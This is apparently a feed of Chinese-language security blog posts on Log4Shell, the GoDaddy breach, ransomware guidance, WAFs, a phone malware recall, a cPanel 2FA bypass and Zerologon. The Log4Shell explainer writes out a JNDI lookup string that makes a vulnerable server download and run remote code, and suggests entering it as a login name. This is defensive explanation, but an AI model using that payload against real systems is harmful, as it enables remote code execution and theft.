The post 出事了 阿伯!!Google緊急修補Chrome一個已有攻擊程式的漏洞 first appeared on 捕夢網 Blog.

關於技術上的分析已經有很多篇文章在講解了，但對於不懂技術的人來說，可能只知道這個漏洞很嚴重，卻不知道為什麼嚴重，也不知道原理到底是什麼，因此我想從讓非技術背景的人也能理解的角度出發，寫一篇比較白話的文章。

從監視攝影機談起

我有個朋友叫小明，他家是開雜貨店的。就跟其他商店一樣，在店裡有一支監視攝影機，怕有什麼消費糾紛或是有人來搶劫或偷東西，因此讓攝影機 24 小時全程錄影，真的發生什麼事了，就會有證據留存下來。

但攝影機的鏡頭角度有限，不可能把整間店面的影像都拍下來，就算真的都拍下來了，要存的資料也會太多（除非小明很有錢，買了一堆攝影機）。因此，攝影機只會對準一些非常重要、值得記錄下來的地方，像是收銀台等等。

原本這支攝影機用了十幾年都沒什麼事情，畢竟不就是把影像記錄起來嗎，能有什麼事情？但最近卻突然有人發現一個攝影機的隱藏功能（嚴格來講不是隱藏功能，因為攝影機的說明書上其實有提到，可是大家都懶得看那一百多頁的說明書，所以很少人知道這個功能）。

這個功能是什麼呢？那就是除了錄影以外，這台監視攝影機還有個智慧圖片辨識的功能，如果它看到特定的影像，會根據影像的內容去執行相對應的動作。舉例來說好了，這個圖片辨識功能需要把指令寫在 100×100 的板子上，一定要黑底白字加上特定格式，像這個樣子：

當攝影機看到上面的圖，符合特定格式，就執行了上面的指令：「關機」，就真的關機了！但關機還沒什麼，指令還可以寫說「把攝影機資料全都給我」之類的，再者，攝影機本來就會即時連線到其他伺服器，這個指令也可以對那些伺服器做操作，例如說把上面的資料全都偷下來等等。

總之呢，一旦讓攝影機拍到指定格式的東西，就會幫你執行指令。

這個功能被爆出來以後，血流成河，因為太多地方都有監視攝影機了，因此許多人都帶著這個板子去看看會不會觸發這個功能。攝影機有分型號，只有一台叫做 log4j 的攝影機會出事，其他不會，但要注意的事情是有些攝影機它雖然不叫做這名字，可其實是從 log4j 作為基底改出來的，就一樣會出事。

而有些東西儘管不是攝影機也會出事，例如說有台智慧冰箱，號稱內部有微型攝影機可以即時監控冰箱內部狀況，恰巧這個微型攝影機就是 log4j 這個型號的攝影機改版出來的，所以也有同樣的問題。

你想想看，如果監視攝影機出了這個問題，那全台灣、全世界這麼多人用這個型號的監視攝影機，當然會引起軒然大波，只要讓攝影機拍到特定的東西就會執行指令，這可嚴重了。

以上是對於 log4j 漏洞的簡單比喻，在這個故事中雜貨店就像是你的網站，而攝影機的功能就是拿來紀錄（log）對於網站的那些請求（request），整個故事只要記兩個重點就好：

1. log4j 是拿來記錄東西用的
2. 漏洞原理是只要紀錄某些特定格式的文字，就會觸發一個功能可以執行程式碼

白話的簡易比喻到這邊先結束，想要更了解 log4j，我們就必須先來看看什麼是 log。

有關於 log 這件事

log 的中文翻譯叫做日誌，我相信許多人對這個名詞並不陌生，如果你有跟工程師合作過，他在解決問題時可能會說：「我去看一下 log」；或是如果你們跟合作廠商各執一詞，他說 A 你們說 B，這時候就會說：「不然看一下 log 吧，看看是誰的問題」

當你跟公司的 IT 合作解決電腦上的小問題時，他也會跟你說要去某個地方複製 log 給他，他才知道發生了什麼事情。

log 就像是一台 24 小時全年無休的監視攝影機一樣，需要紀錄起重要事物的狀況。

那為什麼需要有 log 呢？這問題就像是「為什麼要有監視攝影機？」一樣，答案很簡單，因為出事的時候才有證據。就像行車記錄器一樣，裝了以後若不幸發生車禍，就可以協助判斷肇責。

舉個例子，假設我是 A 公司，我們公司是做購物網站的，而通常金流這一塊並不會自己做，而是會找其他做金流的廠商合作，在後端去「串接」金流服務商提供的功能，講白話一點就是：「當使用者要付款時，我把使用者導過去金流廠商的頁面，付款完再導回來我們網站」，相信有在網路上購物的大家應該很熟悉這個流程。

在這個過程中，雙方都必須留下紀錄，確保未來發生問題時有證據可以輔助說明。

例如說有天 A 公司突然接到一堆客訴說沒辦法付款，這時 A 公司直接打電話去金流商，罵說你們這什麼爛服務，怎麼突然壞掉，而金流商此時提供了伺服器的 log，說：「沒有啊，我們這邊從今天早上八點開始就沒有你們導過來的紀錄了，應該是你們的問題吧？」，後來 A 公司檢查了自己這邊的服務，確實是因為今天早上的版本更新出了問題而導致，跟金流商一點關係都沒有。

這就是 log 的重要性，當出事的時候你才有證據可以盤查，才能盡可能還原當初的狀況。

做開發者的大家都知道 log 很重要，所以 log 基本上是必備的，以網站後端來說，他可能會在交易發生錯誤時留下一筆 log，也有可能在發生非預期錯誤時寫下 log，或是用 log 紀錄 request 中的一些欄位，比如說瀏覽器版本好了，給自己公司內部的數據分析系統來使用。

因此 log 是個十分常見的功能。這也是為什麼如果這個功能出事了，造成的後果會非常嚴重。

Log4j 是什麼？

在寫網站後端的程式碼時，會有不同的程式語言可以選擇，例如說 Python、JavaScript、PHP 或是 Java 等等，而這些程式語言都會有些專門做 log 的套件，簡單來說就是有人已經幫你把功能都寫好了，你只要用就好了。

而 Java 有一個很好用的 log 套件，就叫做 log4j。而這個套件是隸屬於 Apache 軟體基金會底下，因此全名又叫做 Apache Log4j。

Apache 底下有很多不同的軟體跟套件，例如說：

• Apache HTTP Server（最常看到的是這個）
• Apache Cassandra
• Apache Tomcat
• Apache Hadoop
• Apache Struts
• …

所以 Apache Server 跟 Apache log4j 完全是不同的兩個東西，我知道你用 Apache Server，跟你有沒有用 log4j 是兩件事情。

這次出問題的套件就是 log4j，而出問題的原因跟我開頭講的一樣，有一個鮮為人知的功能有著安全性的漏洞，只要 log4j 在記錄 log 時記錄到某個特定格式的東西，就會去執行相對應的程式碼，就像開頭提的那個「關機」的板板一樣。

再講更詳細一點，其實並不是直接執行程式碼，那一段特定格式長得像這樣：

                             ${jndi:ldap://cymetrics.io/test}

先不要管那些你看不懂的字，你可以很明顯看到裡面有一段東西很像網址，對，它就是網址，當 log4j 紀錄上面那一串字的時候，它發現這串字符合特定格式，就會去裡面的網址（cymetrics.io/test）下載程式碼然後執行，因此這是一個 RCE（Remote Code Execution，遠端程式碼執行）漏洞。

前面我有提過後端會記錄許多東西，假設今天有個後端服務是用 Java 寫的，而它用 log4j 記錄了使用者登入失敗時輸入的帳號，這時我只要用 ${jndi:ldap://cymetrics.io/test} 這個帳號登入，就能夠觸發 log4j 的漏洞，讓它執行我準備好的程式碼。

只要能執行程式碼，我就可以做很多事情，例如說把伺服器上的資料偷走，或是安裝挖礦軟體幫我挖礦等等。

為什麼這個漏洞如此嚴重？

第一，log4j 這個套件使用的人數極多，只要你有用 Java，幾乎都會用這個套件來紀錄 log；

第二，觸發方式容易，你只要在 request 的各個地方塞滿這些有問題的字串，server 只要有記錄下來其中一個，就能夠觸發漏洞，而前面我們有提到紀錄 log 本來就是家常便飯的事情；

第三，能造成的影響極大，漏洞被觸發之後就是最嚴重的 RCE，可以直接執行任意程式碼。

結合以上這三點，讓它成了一個核彈級的漏洞。到底有多嚴重，看看這些新聞標題就知道：

1. Apache Log4j 漏洞影響巨大，美國資安主管機關通令政府單位立即修復
2. 微軟、蘋果都受波及！日誌框架Apache Log4j爆漏洞，堪稱近10年最大資安威脅
3. 【Log4Shell漏洞資訊更新】Log4j 2.15.0修補不全、Apache再釋2.16.0新版，國家駭客已開始行動

有許多其他的軟體也都用了 log4j 這個套件，因此也會有問題，國外整理出一份被影響的清單：Log4Shell log4j vulnerability (CVE-2021-44228 / CVE-2021-45046) – cheat-sheet reference guide，像是 Minecraft 這個遊戲的伺服器也有用到 log4j，所以也被這個漏洞給影響。

該怎麼知道我有沒有被這個漏洞影響？

可以先確認自己家的程式有沒有用到 log4j 這個套件以及套件的版本，也需要一併檢查有沒有使用被log4j 影響的其他軟體。

如果你是工程師，也可以用一些現有的工具檢測是否受到漏洞影響，像是：log4j-scan 或是 jfrog 提供的 log4j-tools 等等。

該如何修補？

由瑞士 CERT 發表的這篇文章：Zero-Day Exploit Targeting Popular Java Library Log4j 中，有給了一張從各個環節去防禦的圖：

如果來不及把根本原因修掉，可以先上 WAF（Web Application Firewall），簡單來說就是針對網站的防火牆，把那些惡意的字串擋掉，例如說 Cloudflare 就在第一時間增加了 WAF 的規則加以阻擋，不過也有很多人在研究怎麼繞過 WAF 的規則，因此這是治標不治本的做法。

治本的方法就是把 log4j 停用或是升版，升級到不會被這個漏洞影響的版本，但有些時候第一時間的改版可能沒有把漏洞完全補掉，因此記得更新完以後還是要密切注意是否有更新的版本。例如說在這篇文章寫完後過沒多久，官方就釋出了第三個 patch 修復其他相關問題：Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability。

文章引用/轉載出處

資安人 從監視攝影機理解 Log4j 跟 Log4Shell 漏洞

https://www.informationsecurity.com.tw/article/article_detail.aspx?aid=9631

https://tech-blog.cymetrics.io/posts/huli/what-is-log4j-and-log4shell/

The post 從監視攝影機理解Log4j跟Log4Shell嚴重漏洞 first appeared on 捕夢網 Blog.

GoDaddy 的 WordPress 託管（Managed WordPress）可供客戶建置與管理網站，這項服務會為 GoDaddy 的客戶處理網站的主機管理工作，例如安裝 WordPress、每日自動備份、更新 WordPress 核心元件以及伺服器層級快取等等。

然而 GoDaddy 向 SEC 提交的文件指出，駭客在 9 月初使用遭洩漏的密碼取得其 provisioning system 的造訪權限；而 11 月 17 日 GoDaddy 發現未經授權的第三方嘗試造訪 WordPress 託管環境，在發現可疑入侵後立即將駭客封鎖在外，隨後展開調查並通報當地執法機關。

駭客不僅取得多達 120 萬 GoDaddy 客戶的電子郵件位址，還可以看到客戶的 WordPress 管理員系統預設密碼，這些電子郵件位址可能為其客戶帶來網路釣魚攻擊的風險。GoDaddy 還表示，對於活躍客戶而言，sFTP 和資料庫用戶名稱與密碼也遭外流；而一些客戶的私密金鑰也已外流，這些私密金鑰用於證明網站的真實性。

GoDaddy 團隊正在努力透過重置受影響的密碼，並且重新產生安全憑證以解決這些問題。該公司也正在聯繫所有受駭客攻擊影響的客戶，提供這次安全漏洞的具體細節。

中文引用來源

英文原始出處: GoDaddy Announces Security Incident Affecting Managed WordPress Service

#WordPress,

#GoDaddy

#WordPress 託管

#網路釣魚

The post GoDaddy 的 WordPress 託管遭駭客攻擊，逾百萬客戶電子郵件外流 first appeared on 捕夢網 Blog.

信件內容沒有高深艱澀的專有名詞，取而代之是簡單的建議。讓看這封信的人都可以明白政府給予的建議。

我們說網路無國界，勒索病毒也是一樣。不會說在台灣就不會遭受勒索病毒的攻擊。

捕夢網在看完這封信之後，簡單扼要地將這封美國政府給企業/組織的建議信翻成中文，並將文中建議標註出來，方便閱讀。

=====以下為信件內容=====

信件主旨：對抗勒索病毒威脅的建議措施

勒索病毒攻擊的件數和規模明顯增加，加強國家整體抵禦網路攻擊的能力—無論是企業/組織或公共部門—是總統的首要任務。

在拜登總統的領導下，聯邦政府正在加緊腳步，與世界各地志同道合的合作夥伴合作，以阻止勒索病毒的駭客。這些努力包括破壞勒索病毒網路、與國際合作夥伴合作以追究勒索病毒參與者的責任、制定連貫一致的贖金支付政策以及實現對虛擬貨幣收益的快速追踪和攔截。

企業/組織也負有防止這些威脅的重要責任。企業/組織必須認知說，不論企業/組織規模或所在位置，所有企業/組織都有可能成為勒索病毒的目標。但是，您可以立即採取措施保護自己、客戶和更廣泛的經濟範圍。就像房子有防盜鎖和警報系統，辦公大樓有警衛和保全來應付小偷竊賊，我們建議您認真正視勒索病毒的犯罪，確保您的企業/組織的網路資安足以因應這些威脅。

最近針對美國、愛爾蘭、德國和世界各地其他組織的一連串勒索病毒攻擊中，能反應出最重要的一點是，將勒索病毒視為對核心業務營運的威脅，而非簡單的資料竊取的公司，都能快速做出反應並有效率地從災後恢復。為了解潛在風險，負責主管應立即召集團隊，討論勒索病毒威脅，檢視企業資安狀況和業務連續性計劃，以確保企業/組織有能力繼續或快速恢復營運。

下方詳列美國政府的建議措施—挑選了簡單扼要有效的方法，以幫助企業/組織快速降低資安風險。

我們建議您採取以下措施:

採取總統行政命令的五大措施：
聯邦政府迅速確實地落實拜登總統簽署的《改善國家網路安全行政命令》。我們以身作則，因為這五大措施影響很大：多重身份驗證（因為密碼本身經常被洩露）、端點檢測和回應（尋找網路上的惡意活動並阻止）、資料加密（如果資料被竊取，將無法被駭客利用）和一個經驗老道、經過授權的安全團隊（快速修補漏洞，整合並共享資安防禦中的風險訊息）。以上這些措施將明顯降低網路攻擊成功的風險。

1.備份您的資料、系統映像檔和配置，定期進行測試，保持備份離線：
確保定期測試備份資料，並確保未連接至網路。因為許多勒索病毒企圖尋找、加密或刪除可存取的備份資料。保持您的備份資料離線非常重要，因為如果您的網路資料被勒索病毒加密時，您的企業/組織即可利用備份資料恢復系統。

2.及時更新和修補系統：
包括及時維護作業系統、應用程式和韌體的安全性。考慮使用中央控管的修補管理系統；使用基於風險的評估策略來推行您的修補管理計劃。

3.測試網路安全事件應變計劃：
進行測試是找出現實與計劃之間差異的最好方法。測試企業/組織的核心安全問題，根據這些問題制定您的安全事件應變計劃。例如，企業/組織能否可以在無法存取特定系統的情況下維持運作？可以維持多久？如果帳務系統無法使用，是否就此關閉生產業務嗎？

4.檢查您的安全團隊工作：
使用第三方滲透測試來檢測系統的安全性以及抵禦複雜攻擊的能力。許多利用勒索病毒的駭客極具侵略性以及經驗老道，在他們眼中，您等於敞開大門歡迎他們上門。

5.分隔您的營運網路：
勒索病毒攻擊最近發生了變化—從竊取資料到破壞操作。最重要的是，企業/組織的業務和製造/生產營運必須分開，篩選和限制對於營運網路的存取權限，識別營運網路之間的連結。當企業/組織的營運網路遭到入侵，製定應變流程或轉為人工控制，確保核心網路功能可以被隔離的情況下繼續營運。定期測試應變計劃，例如可以轉為人工控制，以便在網路安全事件期間，確保關鍵功能維持安全無虞。

勒索病毒攻擊已經嚴重擾亂了世界各地的企業/組織，從愛爾蘭、德國和法國的醫院，到美國的輸油管線、英國的銀行。威脅十分嚴重而且持續增加。我們建議您採取上述關鍵措施，來保護您的企業/組織和美國大眾。美國政府正在與世界各國合作，追究勒索病毒的參與組織和包庇他們的國家的責任。但我們無法單獨對抗勒索病毒帶來的威脅，私人企業/組織肩負著明確關鍵的責任。聯邦政府隨時準備幫助您採取上述措施。

原文來源

其他參考資訊:

FACT SHEET: President Signs Executive Order Charting New Course to Improve the Nation’s Cybersecurity and Protect Federal Government Networks

RANSOMWARE GUIDANCE AND RESOURCES

The post 美國政府給企業/組織對抗勒索病毒威脅的建議措施 first appeared on 捕夢網 Blog.

現在你我的網站有著各樣的應用程式，例如常用會員登入、購物車、訂單系統、線上客服等都是。你確認這些程式都安全無虞沒有漏洞嗎？寫程式的是否為了方便，密碼用明碼儲存？訂單沒有加密傳輸，買什麼東西都被看光光？這些沒注意到的小細節，是駭客眼中的大漏洞。可以利用各式各樣的方式鑽進網站，看用戶密碼偷用戶刷卡資料等。輕則以後駭客就用這些來消費，你的網站用戶就是他的提款機。重則資料拿走，賣給詐騙集團賺錢。

WAF是Web Application Firewall(網站應用程式防火牆)縮寫而來。主要用於保護以上提到的應用程式們。方法是監控要連進網站的HTTP傳輸流量，比對病毒、惡意程式資料庫或惡意攻擊手法等，過濾出可疑流量然後把惡意流量拒絕在外，避免用這些漏洞攻擊網站。

網站都希望流量要大，訪客要多。只是訪客一多，難免有閒雜人等想要趁機混入。今天把網站比喻成一棟大樓，WAF就等於大門警衛的概念，針對每一個進入大樓的訪客進行檢查驗證，只允許好的正常的訪客進入，可疑危險的訪客就拒絕他們進入。

前往了解WAF  https://www.pumo.com.tw/security/waf.jsp

WAF能幹嘛？

根據上面所說的，WAF就是用來過濾可疑連線，保護網站的。

根據資安組織OWASP Top 10公布的2020年10大漏洞

Injection 注入攻擊:
Broken Authentication 無效身分驗證
Sensitive Data Exposure 敏感資料外洩
XML External Entities (XXE) XML 外部處理器漏洞
Broken Access control 無效的存取控管
Security misconfigurations 不安全的組態設定
Cross Site Scripting (XSS) 跨站攻擊
Insecure Deserialization 不安全的反序列化漏洞
Using Components with known vulnerabilities 使用已有漏洞的元件
Insufficient logging and monitoring 紀錄與監控不足

我們由此可知攻擊手法千奇百怪，沒有幫網站做過弱點掃描的話，你怎麼知道你的網站程式藏著哪一些漏洞？ WAF就是用來過濾這些針對網站的惡意攻擊的。

如何活用WAF 防禦入侵

為你的網站擋下各式各樣的入侵方式來這裡，不只可以了解 SQL injection 和XSS 跨站攻擊等駭客手法如何攻擊你的網站，還可以了解WAF如何抵禦這些入侵攻擊。最重要的是，明白WAF保障電子商務的安全性，捍衛企業多少無形資產

詳細了解WAF如何抵禦入侵? https://www.pumo.com.tw/security/wafApplication.jsp

IIS 伺服器安全  

WAF可以抵禦IIS伺服器以下漏洞

路徑探索(Path Traversal) / 已知蠕蟲 / 遠端命令執行 / 探針(Probes)DDoS攻擊 / 伺服器入侵

透過執行SaaS(Security-as-a-Service)解決方案，無論網站管理員功力厲害與否，WAF能為網站伺服器提供保護，為網站程式避免掉許多威脅。透過檢測分析網站流量內容，確認是否符合或違反通訊協議、port或IP，避免網站程式被攻擊。WAF能提供優化後的防禦服務，防禦DDoS攻擊、XSS跨站攻擊、SQL Injection、path traversal以及其他網站攻擊技術。

雲端安全

雖然藉由雲端運算跑資料執行程式有一定程度的安全疑慮，然而Google、IBM、Amazon及IT大廠強力推動健康照護以及電子商務等雲端服務，意味著這些安全疑慮是未來雲端發展不得不克服的問題。部屬WAF便是保護網站程式及資料的一種方式，雲端服務商不需額外增添硬體設備，可以安裝在網站程式前面提供保護。

WAF可以抵禦雲端以下漏洞

當部屬完成，WAF即可為網站程式抵禦以下已知的威脅：路徑探索(Path Traversal) / 已知蠕蟲 / 遠端命令執行 / 探針(Probes) / DDoS攻擊 / 伺服器入侵
WAF也能深入執行傳統的安全檢測，例如深度檢測網站服務的流量分析，而這種威脅卻是入侵檢測系統和入侵預防系統常常疏忽掉的。

防禦XSS跨站攻擊

比較常見XSS攻擊的例子，如討論區、留言版或任何能輸入資料的地方，允許使用者輸入HTML、JavaScript，並且正常解析執行。當其他使用者瀏覽這篇留言時，便會執行惡意程式。

為何需要WAF來抵禦XSS跨站攻擊？

• 簡單就能安裝在Apache和IIS伺服器上
• 針對已知或新興的駭客手法進行防禦
• 針對即時防禦，預設最佳化的安全規範
• 提供介面及API，便於管理多台伺服器
• 無需額外的硬體設備，隨業務規模彈性擴充

電子商務安全

電商利益驚人，卻已成駭客眼中肥羊，保障電商安全是當務之急。信用卡盜用及欺詐。信用卡資料安全性對於電子商務來說格外的重要。著名的TJX事件，便是公司沒有採取安全措施的最佳例子，導致9400萬個帳戶遭到入侵，TJX公司被300家以上的銀行聯合訴訟，賠償金額超過70億美金。駭客落網後，發現他透過SQL Injection技術，在各個網站竊取了超過130萬張信用卡資料。

WAF可以抵禦電子商務以下漏洞

常見竊取金融資料的駭客手法:
SQL Injection / XSS跨站攻擊 / Path Traversal
Session Hijacking(會話劫持) / 惡意軟體(Drive-by downloads)

駭客攻擊

不安全的網站越來越多，駭客虎視眈眈您網路上的一切資料 WAF可以抵禦駭客攻擊以下漏洞

一旦決定攻擊目標，便可利用以下方式展開攻擊:XSS跨站攻擊 / SQL Injection / 遠端命令執行 DDoS攻擊 / Path Traversal / 其他一旦找到漏洞，駭客便直接展開攻擊。更可以利用僵屍電腦擴大攻擊範圍，達到最大效果。

信用卡安全

如果網站的信用卡資料常常遭竊的話，除了營業損失之外，還得時常面對法律訴訟以及其他罰款。消費者一旦認定說，在這個網站消費不安全，不願在此消費時，會明顯影響公司的收入。品牌聲譽受損，比任何罰款都來得嚴重。

透過WAF，我們可以即時檢測網站的流量內容，尋找那些已知或未知的惡意封包。這可是原始碼檢測所做不到的。

Apache伺服器安全工具

如果認為Apache伺服器比微軟IIS伺服器安全許多的話，那可真是大錯特錯。跟其他軟體一樣，Apache也是充滿漏洞容易受到攻擊。別把安全視為理所當然，正確設定Apache伺服器

Apache伺服器的安全性一直都在網路管理員的優先名單之內。但你沒有用同樣嚴謹的態度對待這些網站程式的話，還是很容易壟罩在駭客攻擊的陰影中。 常見針對網站程式的攻擊手法有:
XSS跨站攻擊 / 路徑探索(Path Traversal) / SQL Injection
會話劫持(Session Hijacking) / Link Injection / 惡意軟體 / DDoS攻擊

PCI DSS標準規範

為合乎規範安裝WAF的必要性

WAF提供一個直接且節省成本的安全解決方案。不僅合乎PCI標準規範，也針對SQL injection、XSS跨站攻擊和衝著網站程式來的攻擊，提供即時性的防禦。WAF強調預防入侵，而非偵測漏洞。針對網站流量進行深入的封包檢測，在網站程式前架設一道安全防禦。

優點如下：

• 合乎PCI標準規範
• 不需付出額外的研發成本
• 適用於由第三方開發的程式或元件

防護流程示意圖

下方這張圖片可用來說明，每個連線來源與目的都不相同，有登入會員的，有查訂單的。為了不讓所有連線用戶沒有差別的大搖大擺地進入網站，WAF會在進入網站之前，築起一道防護關卡。透過現有的資安威脅資料庫進行流量分析比對，判斷每個連線是否安全，准許安全流量進入網站。那些可疑的、有害的、不信任的流量就排除在外，避免惡意流量入侵網站影響安全性，確保網站的正常營運。

我網站需要WAF嗎？

講完「WAF是什麼？」「WAF能幹嘛？」，一定會有人說「我把程式寫得安全一點才是治本的方法。」把程式寫得很安全，這種思維絕對沒錯。值得鼓勵。

但是怎樣才算是安全沒有漏洞？現在寫得很安全，也許幾個月後駭客有新的攻擊手法！現在寫得很安全，換一個寫程式的，在他眼中網站漏洞百出，你要考慮網站整個重寫嗎？

當然你要重寫程式甚至重寫網站，都是自己的選擇。但是聰明的你要想一想這樣做是否符合成本效益？還是自找麻煩？

WAF扮演重要的網站安全角色。以捕夢網累積服務過很多用戶的經驗，我們明白網站時常經歷歷代不同工程師的改造(？)，每個人的程式邏輯都不一樣。如果沒有統一管理或是依循不同邏輯繼續擴增網站服務，在新舊並存、語法各自為政的狀態下，網站在駭客眼中等同漏洞百出，可是企業往往不自知，讓他們駭客有機可趁。所以「網站需要WAF嗎？」，你認為呢？

WAF對網站的價值在哪？

如果你還是不明白WAF的價值在哪？你可以先想一想你網站價值在哪？

疫情只是催化劑而已，企業將產品及服務轉移到網路上早已是趨勢。在家就可以逛街買東西，手機滑一下就可以轉帳，平板開APP就可以看電影。網站取代了很多實體服務。這時候若網站被駭客攻擊、遭受勒索病毒、客戶資料外洩，導致面臨網站關閉。影響企業銷售、品牌名聲甚至經營存續。跟WAF比起來，網站的價值是否遠大於WAF？是否需要WAF，可以先從網站對您企業所具有的重要性與價值來判斷。

可是裝了WAF不表示就此高枕無憂，網站不需要做其他資安防護。駭客還是有許多其他方式鬧到你的網站生不如死的。

想更多了解WAF，可以參考我們捕夢網的官網https://www.pumo.com.tw/security/waf.jsp

或是打電話或是來信給捕夢網，我們可以針對網站資安好好來聊一聊。
電話:02-8226-9123
信箱:service@pumo.com.tw

#WAF #WEB APPLICATION FIREWALL #網站應用程式防火牆

#SECURITY #WEB SECURITY #弱點掃描

#OWASP #OWASP TOP 10 #網站安全

#網站應用程式安全 #網站安全 #網站漏洞

The post WAF是什麼？WAF能幹嘛？我網站需要WAF 嗎？ first appeared on 捕夢網 Blog.

國家通訊傳播委員會（NCC）今天表示，日前接獲刑事警察局情資，發現AMAZING A32手機製程中被暗中植入惡意程式，民眾購買、使用手機時，詐騙集團可利用該手機門號向遊戲公司申請遊戲帳號，恐讓不知情的手機使用者變成詐騙集團的人頭。

台灣大哥大今天發布新聞稿說明，公司接獲合作廠商「力平國際公司」通知，由其負責生產製造的Amazing A32手機，因強化資安防護，必須全面召回進行安全性軟體升級；台灣大接獲通報後，承諾將與「力平國際公司」充分合作，全力協助用戶將手機作業系統升級至最新V2.0版本。

台灣大指出，這次Amazing A32手機所升級的軟體採用最新V2.0版，經送請全國認證基金會（TAF）認證的國家級資安測試實驗室，財團法人電信技術中心（TTC）執行檢測，已確認符合台灣資通產業標準協會（TAICS）所公布的「智慧型手機系統內建軟體資安標準」及「智慧型手機系統內建軟體資安測試規範」資安檢測項目，已無資安疑慮。

圖片來源: 截圖自台灣大哥大

台灣大表示，即日起客戶可透過公司網站下載V2.0版更新程式，或可前往台灣大各直營門市、8日起可至加盟門市辦理，由專人協助進行系統程式更新。

NCC表示，截至2020年12月20日止，台灣大哥大仍使用該款手機用戶約7600人，已要求台灣大儘速釐清原因，進行善後補救。

台灣大強調，堅持產品安全與服務品質是台灣大奉行的信念與價值，這次配合力平國際召回Amazing A32手機進行軟體升級以強化資安防護，公司除嚴肅以對，也將與「力平國際」充分合作，全力協助客戶進行後續事宜。

強化資安 做好防護不可少

參考更多捕夢網端點保護

轉載文章自 :數位時代 https://www.bnext.com.tw/article/60843/taiwan-mobile

首圖來源：Flickr/Blogtrepreneur CC BY 2.0

The post 台灣大9萬支手機遭植入惡意程式，官方：全面召回、協助軟體升級 first appeared on 捕夢網 Blog.

您的主機商都完成更新了嗎?

捕夢網已完成更新cpanel主機，提供您最完整、最安全的主機!

cPanel 是安裝在Web hosting的軟體，安全漏洞存在，讓攻擊者以暴力攻擊手法繞過雙重身份驗證（2FA）核實保護；換句話說，該攻擊是針對使用cPanel＆Web Host Manager（WHM）軟體的 2FA 容易受到暴力攻擊，使攻擊者能夠猜測 URL 參數並繞過 2FA。

cPanel是通常安裝在shared Web hosting的管理軟體，它允許管理員和網站使用者使用圖形使用者介面自動執行伺服器和網站管理。

其網站上，cPanel聲稱目前被數多家主機代管商所使用，以管理全球超過7,000萬個網域。

發掘所需的有效身份驗證

資安公司Digital Defense的研究人員Michael Clark和Wes Wright發現了該漏洞，追踪為CVE-2020-27641。

攻擊者可能濫用CVE-2020-27641漏洞，在數百萬個網站上安裝cPanel的帳戶繞過2FA的身分驗證，原因為cPanel的安全政策未阻止攻擊者重複提交雙重身份驗證代碼。

研究人員說明: 當啟用MFA後且沒有進行任何鎖定或延遲來防止暴力攻擊時，啟用該功能的用戶可以提交任意數量的MFA (多重身份驗證) key。

這導致了此情況：攻擊者可以在數小時內繞過帳戶的MFA保護。我們也自己測試並顯示，通過對攻擊如進行更精細的調整，可以在幾分鐘內就完成攻擊。

攻擊者只能在發掘“所知或讀取有效身份驗證”的cpanel 帳戶並繞過雙重身份驗證（2FA）。

發布安全更新

cPanel已發布安全更新，已解決這些包含cPanel和WHM版本11.92.0.2、11.90.0.17和11.86.0.32中的漏洞，可通過軟體更新下載。

在更新的cPanel版本上，為了解決這個問題，該公司在cPHulk暴力保護服務中加入了速率限制檢查，如果2FA代碼驗證失敗，就會被視為登錄失敗。

該公司在發布CVE-2020-27641安全更新後上週表示：“沒有理由相信這些漏洞公布於眾。”

因此，cPanel目前僅會發布有限的漏洞訊息。

一旦有足夠的時間允許cPanel＆WHM系統將自動更新到新版本，cPanel將發布額外有關安全議題訊息。

捕夢網已更新cpanel 協助您的主機更安全無虞!!

參考更多捕夢網

文章參考處:

https://www.bleepingcomputer.com/news/security/cpanel-2fa-bypassed-in-minutes-via-brute-force-attacks/?fbclid=IwAR14_zcbDLgji35827ciolNWgnoTS6ugPWOqzKm-e-jMqlLqi27YG3HBcvQ

The post 您的主機商更新了沒？cPanel存在漏洞 first appeared on 捕夢網 Blog.

其實，微軟當時已經指出，此漏洞的CVSS 3.0風險達到滿分10分，並表示與網域控制器（Domain Controller）有關，不過，隨著研究人員的揭露，指出該漏洞可讓駭客輕易掌控AD網域，並解釋漏洞成因，不僅再次引發外界對此漏洞的重視，同時，相關的修補說明與警示也不斷成為新聞焦點。

這個已經使用多年的協定到底有何問題？我們根據首度揭露這項漏洞的資安公司Secura的資安報告，同時也請臺灣資安業者奧義智慧協助，深入說明這次漏洞的細節、根因與利用方式。

漏洞在Netlogon認證交握過程

關於這次Netlogon遠端協定漏洞的成因，我們先從協定運作原理開始說起。

簡單來說，Windows Netlogon遠端協定是一個RPC（Remote Procedure Call）介面，作用於AD網域控制器與Windows網域中電腦之間。舉例來說，以NTLM協定將使用者登入伺服器，就是它的功能之一，其他還包括讓網域內的電腦，以及網域控制器，可以相互驗證身分，特別是還可更新網域中電腦的密碼。

從原理來看，依據Windows Netlogon遠端協定，當用戶端（已加入網域的電腦）連至伺服器端（網域控制器）時，必須先經過認證交握（Authentication handshake）的過程。在此階段中，第一步驟是由用戶端開始，會先傳送一個Client Challenge，然後第二步驟是伺服器端也傳送回一個Server Challenge，此時，將透過一個金鑰衍生函式KDF（Key Derivation Function），以便相互確認彼此，並產生後續通訊都可用於驗證的Session Key。

第三步驟，同時也就是這次漏洞發生的地方。在用戶端通知產生Session Key時，該Session Key將包含secret與Challenge，secret是帳號密碼，並會將前述的Client Challenge加密，當傳送至伺服器端時，加密的結果就會被放入NetrServerAuthentication3的credential參數中，提供給Server進行確認。

一般而言，也就是在沒有漏洞的情況下，攻擊者在此情境中，由於不知道密碼，就無法計算出Session Key，也無法成功算出Client Credential。但是，攻擊者若是不知道Session Key，卻有辦法計算出Client Credential，等於成功繞過這裡的身分驗證。而這次的漏洞，就是這裡的加密過程中，沒有正確使用AES-CFB8加密模式而導致。

從軟體開發的角度來看，這次漏洞突顯了什麼樣的問題？是因為AES-CFB8不夠安全？還是軟體實作上出了什麼問題？

奧義智慧資深研究員陳仲寬的看法是，這個漏洞首先顯示出軟體在安全性及效能上的權衡。他認為，AES-CFB8是一個針對效能的變種演算法，雖常用於實務上，但並未仔細地接受理論上的分析驗證，儘管也沒有人證明其不安全。

而這個漏洞最主要的重點，就是沒有正確實作AES-CFB8加密模式，違反IV數值應為隨機數值。因為在此實作上，將AES-CFB8成立所需要的一項安全屬性- IV數值，寫死為一連串的0，造成當攻擊者將前述Client challenge同樣設定成一連串0時，造成連鎖效應，就有相當高的機率（1/256），導致得到的運算結果也是一連串0。

也因此，攻擊者能夠利用Zerologon漏洞偽造身分，與網域控制站溝通，並且有很高的機率，可以向伺服器端驗證自己的身分，之後，將能藉由Netlogon協定中內建的設定密碼功能，更改網域控制站的電腦帳號與密碼，再以DCSync等攻擊方式，進而控制整個網域。

